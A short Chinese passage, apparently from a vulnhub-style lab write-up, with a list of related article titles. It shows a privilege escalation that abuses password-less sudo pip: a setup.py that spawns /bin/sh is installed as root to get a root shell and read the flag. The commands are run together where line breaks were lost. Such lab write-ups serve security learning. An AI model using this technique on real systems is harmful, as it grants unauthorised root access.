文章插图
发现了pip命令不需要root密码即可执行,那我们就用pip的root权限安装一个shell的程序,成功获取到 root 权限,查看 flag 。
mkdir upfinecd upfineecho "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > setup.pysudo pip install .
文章插图
文章插图
推荐阅读
- 盾之勇者成名录:浪潮绵绵技能效果是什么
- 消除两个inline-block元素之间的间隔
- 诺亚之心风暴试炼51层打法是什么
- vulnhub靶场之EMPIRE
- 我的Vue之旅 07 Axios + Golang + Sqlite3 实现简单评论机制
- Tomcat 调优之从 Linux 内核源码层面看 Tcp backlog
- 【算法训练营day7】LeetCode454. 四数相加II LeetCode383. 赎金信 LeetCode15. 三数之和 LeetCode18. 四数之和
- 地下城堡3:魂之诗10月9日礼包兑换码是什么
- vulnhub靶场|NAPPING: 1.0.1
- flutter系列之:builder为构造器而生